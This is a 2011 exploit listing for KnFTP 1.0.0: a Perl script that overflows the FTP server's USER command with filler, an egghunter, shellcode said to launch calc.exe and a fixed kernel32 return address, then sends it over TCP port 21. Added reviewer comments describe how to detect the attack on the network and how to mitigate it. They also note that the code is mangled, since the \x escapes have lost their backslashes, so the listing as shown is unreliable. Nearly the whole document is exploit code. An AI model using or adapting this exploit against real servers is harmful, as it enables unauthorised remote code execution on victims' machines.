
KnFTP 1.0.0 USER Buffer Overflow

Posted on 19 September 2011

#!/usr/bin/perl
use IO::Socket;
# Exploit Title: KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command.
# Date: 19/9/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Tested on: Windows XP SP3 [En]
#
# Reviewer notes (defender's view of this listing):
#   - The script builds one oversized argument for the FTP USER command and
#     writes it to TCP/21, followed by a PASS command. On the wire the
#     observable is a USER line several hundred bytes long from a client
#     that never completes a normal login; an FTP-aware IDS rule or server
#     log review keyed on USER argument length would surface it.
#   - The listing has been mangled in extraction: the backslashes of the
#     "\x.." escape sequences are missing, so "x41" etc. are three literal
#     characters here, not single bytes. The code as shown is not what the
#     author ran, and it is left byte-for-byte unchanged below.
#   - The overwrite address in $eip is a fixed kernel32.dll location for one
#     specific OS build (per the author's comment), so the file is tied to
#     that exact non-ASLR environment; the underlying defect is unchecked
#     copying of the USER argument in the server, and the mitigation is the
#     vendor fix or removing/segmenting the service, not anything client-side.
#   - No `use strict`/`use warnings`; $target, $socket and the buffer
#     variables are package globals.

print " #----[ mr.pr0n ]---------------------------------------------------------# ";
print "# Target App: KnFTP 1.0.0 Server # ";
print "# Attack : Remote Buffer Overflow Exploit - 'USER' command # ";
print "# Target OS : Windows XP Pro English [Service Pack 3]. # ";
print "#------------------------------[ http://ghostinthelab.wordpress.com ]----# ";

# Hard-coded lab target (RFC 1918 address); no argument parsing.
$target = "192.168.178.21";

# The egghunter.
# Author's own layout: hunter stub, a 4-byte marker "w00t", then the
# remainder of the stub. The marker is searched for as the doubled string
# "w00tw00t" placed in front of $shellcode in $payload below.
$egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02".
             "x58xCDx2Ex3Cx05x5Ax74xEFxB8".
             "w00t".                                # <-- The 4 byte tag
             "x8BxFAxAFx75xEAxAFx75xE7xFFxE7";

# Calc.exe
# Author labels this as a calc.exe launcher; the bytes themselves are not
# verified here (and are not valid escapes in this mangled copy, see above).
$shellcode = "xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1".
             "x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8".
             "xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19".
             "xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49".
             "x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1".
             "xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d".
             "xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36".
             "x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7".
             "x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf".
             "x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e".
             "xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca".
             "xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7".
             "x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45".
             "xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a".
             "xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18".
             "x9cx61";

# Filler sized so that $junk . "w00tw00t" . $shellcode is exactly 284 bytes,
# i.e. 284 is the author's measured offset to the saved return address.
# (In this copy "x41" is 3 chars wide, so the arithmetic no longer holds.)
$junk = "x41" x (284 - length("w00tw00t") - length($shellcode));

# Value written over the saved return address; the author's comment gives it
# as a fixed kernel32.dll address on the tested build, so it is build-specific.
$eip = "x13x44x87x7c"; # 7C874413 JMP ESP - kernel32.dll

# NOTE(review): the comment says 10, the code repeats 15 times.
$padding = "x90" x 15; # Send 10 nops.

# Buffer layout as sent: filler | marker | shellcode | return-address
# overwrite | padding | egghunter.
$payload = $junk."w00tw00t".$shellcode.$eip.$padding.$egghunter;

# Assignment in the condition is intentional: connect, and fall through to
# the else branch on failure. No error text from IO::Socket is reported.
if ($socket = IO::Socket::INET->new (PeerAddr => $target,PeerPort => "21",Proto => "TCP")) {
    print " [*] Sending buffer (".(length($payload))." bytes) to: $target! ";
    # The whole buffer goes as the USER argument; this is the observable on
    # the wire and in the server's log.
    print $socket "USER ".$payload." ";
    print $socket "PASS pwned ";
    # One-second grace before teardown; the script never reads a reply and
    # therefore cannot tell whether the server crashed or rejected the login.
    sleep(1);
    close($socket);
    print "[+] OK, exploitation Done! ";
} else {
    print " [-] Connection to $target failed! ";
}

 
